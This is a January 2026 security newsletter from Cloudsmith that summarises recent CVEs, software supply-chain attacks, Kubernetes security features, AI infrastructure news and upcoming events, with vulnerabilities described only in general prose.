Cloud-Native Digest is your monthly overview of all things open-source, supply chain security, and more
View in browser
DIGEST_Newsletter-Banner_10

Edition: January 2026

 

Brought to you by Nigel Douglas, Head of Developer Relations at Cloudsmith.

 

New year, new monthly cloud-native digest to read. This month, the honeymoon period of 2026 is officially over as we track a massive surge in automated botnet activity and "Ni8mare" RCEs targeting automation platforms. The industry is also grappling with verification debt as AI-generated code floods our repos, while Kubernetes 1.35 introduces much-needed guardrails for kubeconfig plugins. From the industrialisation of npm attacks to the useful impact of AIBOMs, we’ve got a packed edition to keep your supply chain secure.

VULN ROUND UP 

 

Common Vulnerabilities & Exposures

Critical React Router vulnerability lets attackers access and modify server files
NVD: CVE-2025-61686

The only CVE that creeped in from December, this critical (CVSS 9.1) vulnerability is affecting specific versions of React Router and Remix node-based packages. It occurs when the server fails to properly sanitise session IDs, allowing an attacker to manipulate the ID to reference local server files instead of standard session data. If the targeted file (like a .env or credential file) matches the expected session format, the server loads its contents into the session object, potentially exposing sensitive system information through the application's UI or internal logic.

 

Ni8mare  -  Unauthenticated Remote Code Execution in n8n
NVD: CVE-2026-21858 & CVE-2026-21877

A critical vulnerability, dubbed "Ni8mare", has been discovered in n8n, a popular workflow automation platform (CVSS 10). This flaw allows unauthenticated attackers to achieve full Remote Code Execution (RCE) by exploiting a Content-Type confusion bug in Form Webhooks. By sending crafted requests, attackers can bypass authentication, read sensitive files, and steal credentials or API keys, potentially compromising over 100,000 self-hosted instances. Users are urged to upgrade to version 1.121.3 or later immediately, restrict public exposure of webhooks, and rotate any stored credentials to mitigate the risk of a full system takeover.

 

Vulnerability in Uni2TS - AI/ML Open Source Libraries

NVD: CVE-2026-22584

Vulnerabilities in popular AI and ML Python libraries used in Hugging Face models with tens of millions of downloads allow remote attackers to hide malicious code in metadata. The code then executes automatically when loading files containing the poisoned metadata. The open source libraries – Uni2TS, NeMo, and FlexTok – were created by Salesforce, Nvidia, and Apple working with the Swiss Federal Institute of Technology's Visual Intel and Learning Lab (EPFL VILAB), respectively. All three libraries use Hydra, another Python library maintained by Meta and commonly used as a configuration management tool for machine learning projects. Specifically, the vulnerabilities involve Hydra's instantiate() function.

Deserialisation of Untrusted Data in fickling

NVD: CVE-2026-22607

This critical CVE in fickling allows for the deserialisation of untrusted data through the cProfile.run process. Because the tool may misclassify malicious pickle files as "SUSPICIOUS" rather than blocking them, an attacker can bypass security checks to execute arbitrary code. This flaw exploits the deserialisation process (conversion of byte streams back into objects) allowing hackers to hijack the app’s execution flow by providing a specially-crafted file.

 

Mass exploitation through RondoDox Botnet

NVD: CVE-2025-37164

The inclusion of this CVE in CISA’s KEV catalogue highlights a critical escalation in threats against HPE OneView, characterised by the maximum CVSS score of 10.0. The RondoDox Botnet weaponised this unauthenticated RCE flaw, which affects all software versions prior to 11.0, in a massive, automated exploit campaign. CheckPoint reported a surge of over 40,000 attack attempts within a single 4-hour window on Jan. 7, 2026, primarily originating from a suspicious Dutch IP address and targeting government, financial, & manufacturing sectors globally. 

IN THE NEWS

 

CI/CD Security

GCVE: EU-led alternative to MITRE's vulnerability tracking scheme

Source: ITPro

The Global CVE system (GCVE for short), operated by CIRCL, is a decentralised and scalable framework for vulnerability identification designed to complement the traditional CVE system. By authorising independent GCVE Numbering Authorities (GNAs) to allocate their own identifiers (formatted as GCVE-<GNA-ID>-<YEAR>-<ID>), the system eliminates the bottlenecks of centralised block distribution and allows entities like CSIRTs, vendors, and researchers to operate under their own disclosure policies. GCVE remains fully backward-compatible with legacy CVEs through GNA ID 0, offering a community-driven registry that enhances global CVE autonomy.

SBOMs in 2026: Some Love, Some Hate, Much Ambivalence
Source: DarkReading

SBOMs have transitioned from a theoretical concept to a regulatory necessity, driven by mandates like the US Executive Order 14028 and the EU Cyber Resilience Act. While industry leaders have integrated SBOMs with SLSA frameworks to ensure build integrity, widespread efficacy is hindered by incomplete data from open-source projects and a tendency for companies to treat them as "check-the-box" compliance tasks rather than security tools. Critics argue that SBOMs generated late in the lifecycle often lack accuracy and context.

 

Malware Peddlers Are Now Hijacking Snap Publisher Domains

Source: Alan Pope's Blog

There’s a relentless campaign by scammers to publish malware in the Canonical Snap Store. Some get caught by automated filters, but plenty slips through. Recently, these miscreants changed tactics – they’re now registering expired domains belonging to legitimate snap publishers, taking over their accounts, and pushing malicious updates to previously trustworthy applications. This is a significant escalation.

 

From typos to takeovers: Inside the industrialisation of npm supply chain attacks
Source: InfoWorld

The threat landscape for the npm ecosystem has undergone a fundamental shift from simple typosquatting to sophisticated, credential-driven supply chain attacks that exploit the high-trust environment of DevOps. By compromising maintainer accounts and targeting CI/CD pipelines rather than individual laptops, attackers can quietly inherit legitimate authority to distribute malware through trusted updates, reaching millions of downstream users.

Kubernetes

AI and Cloud-Native technologies are transforming the landscape
Source: CNCF Blog

The convergence of AI and Cloud-Native architectures are creating a powerful synergy that transforms rigid infrastructures into intelligent, self-healing ecosystems. By integrating AI with orchestration tools like K8s, DevOps teams are moving beyond static, rule-based scaling toward predictive resource management and automation, significantly reducing costs and downtime. While AI provides the brain for proactive optimisation and enhanced security, cloud native environments offer the muscle, providing the necessary scalability, portability, and GPU management required to train and deploy complex models at scale.

 

K8s v1.35: Restricting executables invoked by kubeconfigs via exec plugin allowList
Source: Kubernetes Blog

The latest version of Kubernetes introduces a new security feature to mitigate risks associated with kubeconfig exec plugins, which can unknowingly execute malicious code during authentication. By adding the credentialPluginPolicy and credentialPluginAllowlist to the kuberc config file, users can now restrict which executables kubectl is permitted to run. This beta feature allows administrators to set global policies (such as DenyAll to block all plugins or Allowlist to specify trusted binaries by name or full path) providing a critical defense against supply-chain attacks targeting credential-fetching scripts.

 

Cloud Native Live: The CNCF Annual Cloud-Native Survey (Infrastructure of AI's Future)
Source: CNCF Community Groups

Join this live discussion unpacking the findings from the CNCF’s annual survey: The Infrastructure of AI's Future, built from open, community-sourced data across industries and regions. Hilary Carter, Jan-Erik Aase, and Jeffrey Sica will explore what the data reveals about Kubernetes in production, infrastructure maturity, and the evolving role of people and culture in cloud-native and AI adoption. Hear expert insights, real-world implications, and what these trends mean for the future of modern infrastructure. The live session will be followed by a Q&A, so bring your questions!

 

How Kubernetes Broke the AWS Cloud Monopoly
Source: TheNewStack

In a recent interview, Bryan Cantrill argues that the release of Kubernetes was the pivotal catalyst that broke the AWS monopoly by offering companies cloud neutrality. Prior to 2014, AWS dominated the market through relentless execution and proprietary APIs that created significant vendor lock-in. By providing a standard, open-source orchestration layer, Kubernetes allowed developers to build applications that could run on any provider, effectively enabling the rise of Azure, GCP, and the multi-cloud era. While AWS remains a market leader, Cantrill suggests that Kubernetes democratises the infrastructure landscape, shifting the industry away from a single-provider party toward a more competitive, trillion-dollar ecosystem.

AI, MLLs & MCP

HuggingHugh: Free security dashboard for AI models
Source: HuggingHugh

HuggingHugh provides SBOM reports for the most popular models on HuggingFace Hub. Think of it as nutrition labels for LLM models, helping you understand what dependencies, vulnerabilities, and licenses are involved before you integrate a model into your project. Just like food nutrition labels help you make informed dietary choices, HuggingHugh helps you make informed decisions about the AI models you consume.

 

Open Responses: What you need to know
Source: HuggingFace

Hugging Face, in collaboration with the open-source community, has announced Open Responses, a new open inference standard designed to replace the aging "Chat Completion" format. Based on OpenAI’s 2025 Responses API, this standard is specifically built for the agentic era, where AI systems autonomously reason, plan, and execute multi-step tasks. Open Responses introduces a unified way to handle text, images, and structured data while formalising subagent loops that allow models to call tools and process results internally in a single request. By offering standard model parameters and expanded visibility into reasoning traces, Hugging Face aims to provide a consistent, interoperable framework for developers and providers to build more complex AI agents.

 

Honeypots detect threat actors mass scanning LLM infrastructure
Source: SCMedia

Recent data from GreyNoise reveals a significant surge in targeted reconnaissance against Large Language Model (LLM) infrastructure, highlighted by a massive scanning campaign that recorded over 91,000 attack sessions between late 2025 and early 2026. This activity (largely driven by just two high-volume IP addresses) systematically probed more than 73 different model endpoints, including major platforms like OpenAI, Google Gemini, and Anthropic, to identify misconfigured servers leaking API access. A separate grey-hat operation exploited Ollama’s model-pull functionality to conduct Server-Side Request Forgery (SSRF) attacks.

 

Powerful local AI automations with n8n, MCP and Ollama
Source: KDnuggets

The setup combines Ollama for executing local LLMs (eg: Llama 3), n8n for comprehensive workflow automation, and an MCP server to establish a bridge between the LLM and custom external tools. This practical guide outlines the configuration of an MCP server and its connection to n8n, allowing a local AI model to execute real-world automations like sending emails or interacting with various APIs. Methodology also champions privacy, cost reduction, and greater control over LLMOps by maintaining both models and workflow processing locally.

 

Making (Very) Small LLMs Smarter
Source: Docker Blog

Philippe, a Principal Solutions Architect at Docker, demonstrates how to effectively use Small Language Models (SLMs) locally for specialised tasks like code generation. By leveraging Retrieval Augmented Generation (RAG), he overcomes the inherent limitations of small models (such as 0.5B to 7B parameters) which typically lack knowledge of niche or recent projects like his Golang library, Nova. Using tools like Docker Model Runner, LangchainJS, and Qwen2.5-Coder, Philippe shows that by splitting docs into chunks & storing them in an in-memory vector database, a local LLM can provide accurate, context-aware code snippets while maintaining data privacy and working offline.

 

Why CVEs Belong in Frameworks and Apps, Not AI Models
Source: Nvidia Developer Blog

While the CVE system is the global standard for cataloging software flaws, applying it to individual AI models is generally a scope error. Most AI-related risks (such as adversarial prompts, data leakage, and statistical biases) are inherent properties of machine learning or failures of the surrounding application and framework, rather than discrete, patchable bugs in the model weights themselves. The CVE framework is designed for actionable, fixable weaknesses in code; therefore, security efforts should focus on patching the software layers that serve the models & using supply chain integrity tools to verify data, rather than labeling every statistical behaviour as a model-level CVE.

COMMUNITY

 

Events & Meet-ups

How to securely source your LLM models from Hugging Face

Date/Time: February 5, 2026 (4pm GMT)

Location: Virtual Webinar

 

Open model ecosystems like Hugging Face have transformed how teams build with AI. But with that speed comes risk: unverified publishers, dependency confusion, and models that change beneath your feet. If you’re pulling models straight into production pipelines, you’re inheriting all the uncertainty of the public internet – into some of your most sensitive systems. In this live session, Cloudsmith experts will show you how to take control of your AI supply chain. You’ll learn how to securely ingest, verify, and distribute LLM models from Hugging Face without slowing your teams down.

 

ContainerDays London 2026
Date/Time: February 11-12, 2026
Location: The Truman Brewery, London, United Kingdom


If you’re in the area, I’ll be delivering two sessions on Kubernetes supply chain security:

1. Using OpenSSF Malicious Packages project to identify malware in running containers
2. Fantastic Exploits and Where to Find Them

 

The Cloudsmith team will also be around to chat about all things related to secure artifact management.


KubeCon + CloudNativeCon Europe 2026
Date/Time: March 23-26, 2026
Location: RAI Amsterdam, The Netherlands


The Cloud Native Computing Foundation’s flagship conference brings together adopters and technologists from leading open source and cloud native communities in Amsterdam. Be a part of the conversation as CNCF Graduated, Incubating, and Sandbox Projects unite for four days of collaboration, learning, and innovation to drive the future of cloud native computing. We’ll also be running another exciting Capture The Flag (CTF) event.

Signed, sealed, and delivered - see you next issue.

Nigel Douglas

Nigel Douglas

Head of Developer Relations

Cloudsmith

Cloudsmith, 7 Donegall Square West, Belfast, Northern Ireland BT1 6JH

Unsubscribe Manage preferences

LinkedIn
X
Instagram
Website